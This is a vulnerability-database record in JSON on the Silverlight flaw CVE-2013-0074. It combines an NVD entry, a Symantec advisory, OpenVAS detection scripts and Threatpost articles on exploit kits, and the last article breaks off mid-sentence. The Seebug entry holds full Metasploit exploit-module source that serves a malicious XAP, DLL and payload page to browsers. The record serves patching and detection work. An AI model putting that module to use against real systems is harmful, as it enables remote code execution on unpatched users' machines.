{"cve": [{"lastseen": "2018-11-01T05:14:08", "bulletinFamily": "NVD", "description": "Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 does not properly validate pointers during HTML object rendering, which allows remote attackers to execute arbitrary code via a crafted Silverlight application, aka \"Silverlight Double Dereference Vulnerability.\"", "modified": "2018-10-30T12:27:21", "published": "2013-03-12T20:55:01", "id": "CVE-2013-0074", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0074", "title": "CVE-2013-0074", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-14T22:39:14", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Silverlight is prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with the privileges of the currently logged-in user. Failed exploit attempts will likely result in a denial-of-service condition.\n\n### Technologies Affected\n\n * Microsoft Silverlight 5.0 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Do not follow links provided by unknown or untrusted sources.** \nAttackers could exploit this vulnerability by enticing a user to visit a malicious website. Do not follow links provided by sources of questionable integrity.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisable support for script code and active content within a client browser to reduce the chances of a successful exploit. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2013-03-12T00:00:00", "published": "2013-03-12T00:00:00", "id": "SMNTC-58327", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/58327", "type": "symantec", "title": "Microsoft Silverlight Double Deference CVE-2013-0074 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-22T16:42:17", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.", "modified": "2018-10-12T00:00:00", "published": "2013-03-13T00:00:00", "id": "OPENVAS:1361412562310902954", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902954", "title": "Microsoft Silverlight Remote Code Execution Vulnerability (2814124)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms13-022.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Microsoft Silverlight Remote Code Execution Vulnerability (2814124)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:silverlight\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902954\");\n script_version(\"$Revision: 11865 $\");\n script_bugtraq_id(58327);\n script_cve_id(\"CVE-2013-0074\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-13 12:18:20 +0530 (Wed, 13 Mar 2013)\");\n script_name(\"Microsoft Silverlight Remote Code Execution Vulnerability (2814124)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/52547\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2814124\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"gb_ms_silverlight_detect.nasl\");\n script_mandatory_keys(\"Microsoft/Silverlight/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"Microsoft Silverlight version 5\");\n script_tag(name:\"insight\", value:\"The flaw is due to a double-free error when rendering a HTML object, which\n can be exploited via a specially crafted Silverlight application.\");\n script_tag(name:\"solution\", value:\"Run Windows Update and update the listed hotfixes or download and\n install the hotfixes from the referenced advisory.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( vers !~ \"^5\\.\" ) exit( 99 );\n\nif( version_in_range( version:vers, test_version:\"5.0\", test_version2:\"5.1.20124.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, vulnerable_range:\"5.0 - 5.1.20124.0\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:38:06", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.", "modified": "2017-12-20T00:00:00", "published": "2013-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902954", "id": "OPENVAS:902954", "title": "Microsoft Silverlight Remote Code Execution Vulnerability (2814124)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms13-022.nasl 8190 2017-12-20 09:44:30Z cfischer $\n#\n# Microsoft Silverlight Remote Code Execution Vulnerability (2814124)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:silverlight\";\n\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code.\n Impact Level: System/Application\";\n\ntag_affected = \"Microsoft Silverlight version 5\";\ntag_insight = \"The flaw is due to a double-free error when rendering a HTML object, which\n can be exploited via a specially crafted Silverlight application.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms13-022\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.\";\n\nif(description)\n{\n script_id(902954);\n script_version(\"$Revision: 8190 $\");\n script_bugtraq_id(58327);\n script_cve_id(\"CVE-2013-0074\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 10:44:30 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-13 12:18:20 +0530 (Wed, 13 Mar 2013)\");\n script_name(\"Microsoft Silverlight Remote Code Execution Vulnerability (2814124)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/52547\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2814124\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"gb_ms_silverlight_detect.nasl\");\n script_mandatory_keys(\"Microsoft/Silverlight/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( vers !~ \"^5\\.\" ) exit( 99 );\n\nif( version_in_range( version:vers, test_version:\"5.0\", test_version2:\"5.1.20124.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, vulnerable_range:\"5.0 - 5.1.20124.0\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:41:44", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.", "modified": "2018-10-12T00:00:00", "published": "2013-03-13T00:00:00", "id": "OPENVAS:1361412562310902955", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902955", "title": "Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms13-022_macosx.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902955\");\n script_version(\"$Revision: 11865 $\");\n script_bugtraq_id(58327);\n script_cve_id(\"CVE-2013-0074\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-13 12:40:20 +0530 (Wed, 13 Mar 2013)\");\n script_name(\"Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/52547\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2814124\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gb_ms_silverlight_detect_macosx.nasl\");\n script_mandatory_keys(\"MS/Silverlight/MacOSX/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"Microsoft Silverlight version 5 on Mac OS X\");\n script_tag(name:\"insight\", value:\"The flaw is due to a double-free error when rendering a HTML object, which\n can be exploited via a specially crafted Silverlight application.\");\n script_tag(name:\"solution\", value:\"Install the patch\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nslightVer = get_kb_item(\"MS/Silverlight/MacOSX/Ver\");\n\nif(!slightVer || !(slightVer =~ \"^5\\.\")){\n exit(0);\n}\n\nif(version_in_range(version:slightVer, test_version:\"5.0\", test_version2:\"5.1.20124.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:11:02", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.", "modified": "2016-11-18T00:00:00", "published": "2013-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902955", "id": "OPENVAS:902955", "title": "Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms13-022_macosx.nasl 4570 2016-11-18 10:17:05Z antu123 $\n#\n# Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code.\n Impact Level: System/Application\";\n\ntag_affected = \"Microsoft Silverlight version 5 on Mac OS X\";\ntag_insight = \"The flaw is due to a double-free error when rendering a HTML object, which\n can be exploited via a specially crafted Silverlight application.\";\ntag_solution = \"Install the patch from below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms13-022\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS13-022.\";\n\nif(description)\n{\n script_id(902955);\n script_version(\"$Revision: 4570 $\");\n script_bugtraq_id(58327);\n script_cve_id(\"CVE-2013-0074\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-11-18 11:17:05 +0100 (Fri, 18 Nov 2016) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-13 12:40:20 +0530 (Wed, 13 Mar 2013)\");\n script_name(\"Microsoft Silverlight Remote Code Execution Vulnerability-2814124 (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/52547\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2814124\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms13-022\");\n\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gb_ms_silverlight_detect_macosx.nasl\");\n script_mandatory_keys(\"MS/Silverlight/MacOSX/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nslightVer = \"\";\n\n## Get the version from KB\nslightVer = get_kb_item(\"MS/Silverlight/MacOSX/Ver\");\n\nif(!slightVer || !(slightVer =~ \"^5\\.\")){\n exit(0);\n}\n\nif(version_in_range(version:slightVer, test_version:\"5.0\", test_version2:\"5.1.20124.0\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:14:04", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-83333", "id": "SSV:83333", "title": "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "type": "seebug", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n MANIFEST = <<-EOS\r\n<Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" EntryPointAssembly="SilverApp1" EntryPointType="SilverApp1.App" RuntimeVersion="4.0.50826.0">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name="SilverApp1" Source="SilverApp1.dll" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1 on both x32 and x64 architectures.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X86_64],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86',\r\n {\r\n 'arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows x64',\r\n {\r\n 'arch' => ARCH_X86_64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Mar 12 2013",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def setup\r\n @xap_name = "#{rand_text_alpha(5 + rand(5))}.xap"\r\n @dll_name = "#{rand_text_alpha(5 + rand(5))}.dll"\r\n File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.xap" ), "rb") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.dll" ), "rb") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n my_payload = get_payload(cli, target_info)\r\n\r\n # Align to 4 bytes the x86 payload\r\n if target_info[:arch] == ARCH_X86\r\n while my_payload.length % 4 != 0\r\n my_payload = "\\x90" + my_payload\r\n end\r\n end\r\n\r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n\r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type="text/css">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id="form1" runat="server" >\r\n <div id="silverlightControlHost">\r\n <object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%">\r\n <param name="source" value="<%= @xap_name %>"/>\r\n <param name="background" value="white" />\r\n <param name="InitParams" value="payload=<%= my_payload %>" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status("request: #{request.uri}")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status("Sending XAP...")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status("Sending DLL...")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status("Sending XAML...")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status("Sending HTML...")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n\r\nend\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83333"}], "threatpost": [{"lastseen": "2018-10-06T22:59:45", "bulletinFamily": "info", "description": "When authorities in Russia [arrested Paunch](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), the alleged creator of the Blackhole exploit kit, last month, security researchers and watchers of the malware underground predicted that taking him off the board would put a dent in the use of Blackhole and force its customers onto other platforms. Six weeks later, it now appears that Blackhole is almost gone and the [Cool exploit kit](<http://threatpost.com/old-ie-attack-finds-its-way-into-cool-exploit-kit/100330>), another alleged creation of Paunch, has essentially disappeared, as well.\n\nThe Cool exploit kit isn\u2019t as well-known as Blackhole, but it is just as dangerous and was being sold at a much higher price during its heyday. Blackhole is one of the more venerable exploit kits for sale on the underground markets and it has been very popular with a variety of attackers and malware gangs over the years. It\u2019s often used in drive-by download scenarios to compromise users\u2019 machines through the use of browser exploits or exploits for plug-ins such as Java or Flash. Blackhole customers could buy a yearly license for about $1,500 or even just rent it for a day for $50. Cool could rent for as much as $10,000 a month.\n\nA malware researcher who uses the name [Kafeine](<http://malware.dontneedcoffee.com/2013/10/paunch-arrestationthe-end-of-era.html>) and closely follows the sale and use of exploit kits has looked at the major groups that have been using Cool and Blackhole in recent years and found that Cool is virtually gone from the exploit kit landscape. The only crew still using Cool is the [Reveton](<http://threatpost.com/reveton-ransomeware-adds-password-purloining-function/100712>) gang, which Kafeine said was the first major customer for the exploit kit, and has been using it for more than a year to push their ransomware. Reveton has taken many forms in its lifetime, showing up as fake FBI or Justice Department warnings about illegal content on a user\u2019s machine.\n\nThe Reveton gang is still using Cool, but it\u2019s not the main version of the kit. Like many of the other exploit kits, there are so-called private versions of Cool available for sale to premium customers at premium prices. They often will include private zero day vulnerabilities not available to other users and extra features. Kafeine said via email that the Reveton crew is using its own version of Cool these days.\n\n\u201cCool has disappeared with Paunch. Main user (reveton Team) is now on a \u2018private\u2019 EK that we decided to name Angler EK,\u201d Kafeine said.\n\nThe [Angler exploit kit](<http://threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>) was the first to add the [Microsoft Silverlight vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0074>) CVE-2013-0074. As for Blackhole, there are still a handful of attack groups using it, but Kafeine said that he has seen about a 98 percent drop in the usage of that exploit kit since the arrest of Paunch.\n\n\u201c[Blackhole] is almost dead,\u201d he said.\n\nThe one main group that\u2019s using Blackhole is known as /closest/ and has been pushing out LinkedIn spam with malicious links to pages that deliver the exploits. The crew is using Blackhole for a variety of purposes, including pushing the Cutwail bot, some pay-per-click malware and other threats.\n\nImage from Flickr photos of [NASA Goddard Space Flight Center](<http://www.flickr.com/photos/gsfc/>).\n", "modified": "2013-12-02T18:18:34", "published": "2013-11-26T11:19:11", "id": "THREATPOST:4092394DCBD8AD236C5B4A45CBC114AB", "href": "https://threatpost.com/blackhole-and-cool-exploit-kits-nearly-extinct/103034/", "type": "threatpost", "title": "Blackhole and Cool Exploit Kits Nearly Extinct", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:47", "bulletinFamily": "info", "description": "Developers behind the Angler Exploit Kit have apparently added a new exploit over the last week that leverages a known vulnerability in Microsoft\u2019s Silverlight browser framework.\n\nSilverlight, similar to Adobe Flash, is Microsoft\u2019s plug-in for streaming media on browsers and is perhaps most known for being used in Netflix\u2019s streaming video service.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/11/07025333/chris_wakelin.jpg>)\n\nBritish-based security researcher Chris Wakelin discovered the Silverlight exploit last week and posted about it on Twitter via his @EKWatcher handle. From there an independent security researcher that goes by the name Kafeine picked it up, investigated Angler EK and described his findings on his blog [Malware Don\u2019t Need Coffee](<http://malware.dontneedcoffee.com/2013/11/cve-2013-0074-silverlight-integrates.html>).\n\nAccording to Kafeine the exploit kit usually checks to see if the system it\u2019s deployed on has Java or Flash but can now check to see if has Silverlight installed. If it can\u2019t exploit Java or Flash it delivers a remote control exploit ([CVE-2013-0074](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0074>)) that targets Silverlight 5. The vulnerability was patched [in March](<http://technet.microsoft.com/en-us/security/bulletin/ms13-022>) but users running Silverlight who haven\u2019t yet patched the critical vulnerability are still at risk and would be best served to update their software.\n\nAngler EK surfaced last month following [the arrest](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>) of the Blackhole Exploit Kit\u2019s creator Paunch in Russia. According to Kafeine, the same team behind the more souped-up [Cool Exploit Kit](<http://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/77386>), who also had ties to Blackhole, helped develop Angler and are also behind the popular Reveton ransomware.\n\nNetflix has 40 million global subscribers that could potentially be vulnerable to the exploit since the service principally uses Silverlight for streaming media. The video streaming company has been making strides to ditch Silverlight for HTML5 over the past few months and while it introduced HTML5-support in Windows 8.1 and Internet Explorer 11 over the summer, the technology hasn\u2019t been completely fleshed out yet on most browsers.\n", "modified": "2013-11-21T15:18:17", "published": "2013-11-19T15:24:15", "id": "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "href": "https://threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968/", "type": "threatpost", "title": "Exploit Kit Adds Vector for Silverlight Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:08", "bulletinFamily": "info", "description": "[](<https://threatpost.com/critical-ie-windows-kernel-flaws-patched-031213-0/>)For the second month in a row, Microsoft has released a cumulative update for Internet Explorer, patching a number of critical remote code execution vulnerabilities in the browser, including one previously disclosed. It also patched a serious kernel mode driver vulnerability that could enable attackers to gain root access to a machine using a malicious USB drive, a la Stuxnet.\n\nMicrosoft\u2019s Patch Tuesday security updates include four critical bulletins among the seven released today. Microsoft also released its policy on providing patches for Windows Store applications, saying that it will deliver patches for Windows Store apps as they become 